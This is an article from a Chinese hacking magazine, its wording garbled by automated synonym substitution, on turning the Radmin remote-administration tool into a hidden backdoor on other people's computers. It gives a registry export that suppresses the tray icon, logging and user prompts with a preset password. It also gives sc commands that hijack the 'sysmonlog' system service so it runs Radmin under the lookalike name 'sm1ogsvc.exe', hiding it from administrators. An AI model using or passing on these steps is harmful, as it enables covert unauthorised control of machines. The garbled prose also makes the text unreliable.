BY 剑心[B.C.T][已经发表于黑客x档案] 首先说说Radmin，Radmin真是个好器械，我也是最近才发现这个器械的利益，譬如不被杀，治理很利便，速率也很快，设置简朴……横竖我是看到许多治理员就是选用的这个。只管是个好器械，瑕玷照样有的，譬如谁人服务名就很显眼，历程里的谁人R_server.exe更是被人见到就杀，现在一个最菜的治理员也知道用义务治理器去查杀历程，设置的时刻若是失足也很容易被发现，他的谁人图标也很有个性，有个性就容易被发现，另有就是有人埋怨谁人服务名总是R_server在服务治理器里很是显眼……然则，本着我对Radmin的热爱，照样要把这个好器械从治理员的眼皮底下拯救回来，革新成属于自己的最终木马，至于若何拯救这个好马那就跟我来看看吧！首先说说设置，然后是隐藏。设置我想不用多说，以前黑x有文章已经说得很清晰了，网管想看到的器械你不要让他看到就可以了。我们知道Radmin只需要R_Server.exe，AdmDll.dll和raddrv.dll这三个文件就可以安装，以是你首先要将这几个文件传到对方机械上，嫌贫苦的话后面有好的设施。至于Radmin的设置，可以先在自己的机械上设置好然后导出[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]下的内容，传到别人机械上导入，Radmin就跟你机械上设置的一样了，由于Radmin服务依赖的器械都在这个项下面。注重的几个是不要义务栏显示，不要日志纪录，然后修改自己的密码什么的基本就可以了。我设置的如下:[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]"NTAuthEnabled"=hex:00,00,00,00"Parameter"=hex:fc,e2,fe,2b,e9,24,fd,11,67,bd,be,3b,5c,e1,ac,8b"Port"=hex:8b,05,00,00"Timeout"=hex:0a,00,00,00"EnableLogFile"=hex:00,00,00,00"LogFilePath"="c:\\logfile.txt""FilterIp"=hex:00,00,00,00"DisableTrayIcon"=hex:01,00,00,00"AutoAllow"=hex:00,00,00,00"AskUser"=hex:00,00,00,00"EnableEventLog"=hex:00,00,00,00这样设置的密码是jnc，端口是，不要急，详细的注册表文件config.reg已经带在后面了，想修改自己的密码和端口的话可以从自己机械上找到响应的注册表键值替换就OK了。然则注重，Radmin是从这个键值下读取响应的参数，以是每次用rededit -s导入注册表的时刻，要先停服务然后启动服务才有用的。什么，你不知道怎么安装radmin，自己看以前的文章去！好了，设置就说这么多，这样设置的只管不会被通俗的用户发现，然则上面的几个瑕玷也都出来了，稍微有一点履历的治理员就很可以发现。关于服务隐藏以前魔女的条件也说过，然则不是很行得通，她是想把系统的剪贴薄删掉，然后把自己的Radmin伪装成剪贴薄，看起来是很好，可是事实上呢？我不说删除clipsrv.exe时系统弹出来的谁人文件珍爱对话框没有设施解决，如图一。另有就是你的服务显示名称可以伪装，然则服务名照样R_server，这个没有设施变的，很容易被识破。我们可以不删除服务然后替换而是直接将系统的服务的本质改成我们的，然则让其他的譬如服务名等都不做任何转变，不领会内幕的人是很难看出来的。下面我们就将Radmin隐藏到系统的服务内里，我们将他的可执行文件路径改了就行了的。不只是Radmin，其他的后门如木马，另有Tcmd等他们自己默认安装的隐蔽性并不是很好，然则可以通过类似的方法来革新。首先是选我们要取代哪个服务，这里我推荐用那些不依赖其他任何服务就能自己启动的服务，否则会泛起不能顺遂启动的情形，固然也不能被其他人所依赖了，人家系统挂了就完了:）。那些用svchost.exe的就不要看了，呵呵。这里我推荐sysmonlog服务，就是谁人"设置性能日志和警报"服务，相符我们的条件而且还不会被一样平常的治理员所注重，看看我若何做的吧。假设我们已经安装了Radmin，注册表文件已经导入，现在的Radmin的程序名字照样R_server.exe，在系统目录下。我们停掉Radmin服务后先把他的名字改成sm1ogsvc.exe。为什么改成这个？呵呵，不觉得1和l很像么？好了，更名之后我们可以来替换了。Sc这个工具知道吧，用以下的下令:sc config sysmonlog start= auto \\将"设置性能日志和警报"服务设置成自启动，没有什么疑点吧？\\sc config sysmonlog binpath= "c:\winnt\system32\sm1ogsvc.exe /service" \\修改其二进制路径，实在就是我们伪装的Radmin\\net start sysmonlog \\启动服务，Radmin又最先事情啦